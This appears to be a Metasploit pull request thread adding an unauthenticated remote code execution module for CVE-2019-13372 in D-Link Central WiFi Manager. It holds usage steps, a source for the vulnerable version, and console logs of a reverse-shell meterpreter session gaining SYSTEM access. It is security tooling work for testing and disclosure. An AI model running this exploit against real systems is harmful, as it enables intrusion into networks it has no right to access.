Add RCE exploit for CVE-2019-13372

[red0xff]

This module adds a module for CVE-2019-13372, a remote code execution vulnerability in D-link Central WiFi Manager(CWM-100), it's possible to inject PHP code because a user-controlled cookie is passed to eval() without being sanitized.

Verification

List the steps needed to make sure this thing works

• Start msfconsole
• Do: use windows/http/dlink_central_wifimanager_rce
• Do: set RHOSTS [RHOSTS]
• Set payload options: LHOST, LPORT etc.
• Check the payload options: show options
• Do: exploit
• Verify that you get a shell / meterpreter / that whatever payload you used was executed

Reproducing

a vulnerable version is available at DLink's vulnerability announcement:

• The announcement
• ftp://ftp2.dlink.com/SOFTWARE/CENTRAL_WIFI_MANAGER/CENTRAL_WI-FI_MANAGER_1.03.zip

Things to troubleshoot

• The meterpreter payload works fine, but for some reason, when I execute the shell command from meterpreter, I get a cmd prompt, and then it hangs.

• When I try to migrate from meterpreter, I get:

meterpreter > ps

Process List
============

 PID   Name                            User                          Path
 ---   ----                            ----                          ----
 0     System Idle Process             NT AUTHORITY\SYSTEM           System Idle Process
 4     System                          NT AUTHORITY\SYSTEM           System
 168   Central WifiManager Server.exe  reVM-PC\reVM                  Central WifiManager Server.exe
 216   smss.exe                        NT AUTHORITY\SYSTEM           smss.exe
 268   svchost.exe                     NT AUTHORITY\NETWORK SERVICE  svchost.exe
 292   csrss.exe                       NT AUTHORITY\SYSTEM           csrss.exe
 340   wininit.exe                     NT AUTHORITY\SYSTEM           wininit.exe
 352   csrss.exe                       NT AUTHORITY\SYSTEM           csrss.exe
 392   winlogon.exe                    NT AUTHORITY\SYSTEM           winlogon.exe
...

meterpreter > migrate 392
[-] Error running command migrate: NoMethodError undefined method `pid' for nil:NilClass

No idea if that's a bug in php payloads, but other common meterpreter commands work fine, I wonder if that's something from this exploit.

Related vulnerabilities

An auxiliary/sqli module for CVE-2019-13372 will be added soon, part of another pull-request (and using the SQL Injection engine I've been working on)

[space-r7]

Hey @red0xff, thank you for the module! I have just a few suggestions.

[space-r7]

Tested successfully on my end:

msf5 > use exploit/windows/http/dlink_central_wifimanager_rce 
[*] Using configured payload php/meterpreter/reverse_tcp
msf5 exploit(windows/http/dlink_central_wifimanager_rce) > set rhost 192.168.37.131
rhost => 192.168.37.131
msf5 exploit(windows/http/dlink_central_wifimanager_rce) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(windows/http/dlink_central_wifimanager_rce) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable.
[*] Sending stage (38288 bytes) to 192.168.37.131
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.131:54320) at 2020-08-18 09:17:31 -0500

meterpreter > getuid
Server username: SYSTEM (0)
meterpreter > sysinfo
Computer    : DESKTOP-AQT4EG1
OS          : Windows NT DESKTOP-AQT4EG1 6.2 build 9200 (Windows 8 Professional Edition) i586
Meterpreter : php/windows

Regarding php meterpreter and migrate, php meterpreter does not support it. shell should work, though.

[space-r7]

Release Notes

New module exploits/windows/http/dlink_central_wifimanager_rce targets D-Link Central WiFi Manager software for Windows platforms, achieving unauthenticated code execution on vulnerable targets by sending malicious php code via a cookie, which gets passed to eval() without any sanitization (CVE-2019-13372).